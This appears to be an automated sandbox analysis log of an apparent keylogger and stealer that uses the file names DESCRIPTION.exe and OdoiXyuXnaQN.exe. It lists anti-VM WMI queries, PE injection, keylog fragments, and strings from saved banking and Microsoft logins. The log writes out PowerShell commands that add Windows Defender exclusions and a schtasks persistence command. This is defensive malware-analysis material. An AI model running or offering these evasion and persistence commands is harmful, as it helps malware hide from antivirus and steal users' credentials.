Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: DESCRIPTION.exe PID: 180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OdoiXyuXnaQN.exe PID: 5480, type: MEMORYSTR

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory allocated: 9F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory allocated: 2480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory allocated: 4480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory allocated: 8930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory allocated: 71D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory allocated: 9930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory allocated: A930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory allocated: AE10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory allocated: BE10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory allocated: 1110000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory allocated: 4AC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory allocated: 89A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory allocated: 99A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory allocated: 9BA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory allocated: ABA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory allocated: AF90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory allocated: BF90000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7169	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 911	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6233	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 365	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Window / User API: foregroundWindowGot 1777	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Window / User API: foregroundWindowGot 1774

Source: C:\Users\user\Desktop\DESCRIPTION.exe TID: 5356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1484	Thread sleep count: 7169 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744	Thread sleep count: 911 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4508	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3160	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe TID: 356	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior

Source: WebData.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: WebData.9.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: WebData.9.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: WebData.9.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: WebData.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: WebData.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: WebData.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: WebData.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: WebData.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: WebData.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: WebData.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: WebData.9.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: WebData.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: WebData.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: WebData.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: WebData.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: WebData.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: WebData.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: WebData.9.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: WebData.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: WebData.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: WebData.9.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: WebData.9.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh=
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmtools
Source: WebData.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: WebData.9.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: WebData.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: WebData.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWstring
Source: WebData.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: WebData.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: WebData.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: WebData.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\DESCRIPTION.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe"
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Memory written: C:\Users\user\Desktop\DESCRIPTION.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Memory written: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Users\user\Desktop\DESCRIPTION.exe "C:\Users\user\Desktop\DESCRIPTION.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp"
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"

Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, KeyDataYRTmqAXe.txt.9.dr	Binary or memory string: [07:21:26]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerF0C2F13ko2
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managertxt2F13ko2
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:12]<<Program Manager>>
Source: KeyDataGlLPGWOk.txt.9.dr	Binary or memory string: [07:22:35]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:20]<<gQ","file_unique_id":"AgADRRkAAjjDOFA","file_size":363},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}-99b9-fca7ff59c113--4]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:20]<<Program Managere_id":"AgADOBkAAjjDOFA","file_size":363},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}-99b9-fca7ff59c113--4]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:13]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:36]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:23]<<Program 23]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 59c113--f5-b1ed-4060-99b9-fca7ff59c113--:22]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:57]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:08]<<Program Manager>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:37]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:06]<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :22:11]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111D000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:01]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111D000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:58]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:13]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:18]<<Program Manager>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:59]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2730998097.00000000082C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:10]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:02]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FC:\Users\user\AppData\Local\Adobe07:21:20]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:16]<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]<<Program Manager>>ram ManX
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:33]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2730998097.00000000082C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:09]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :21:44]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:50]<<Program Manager>>
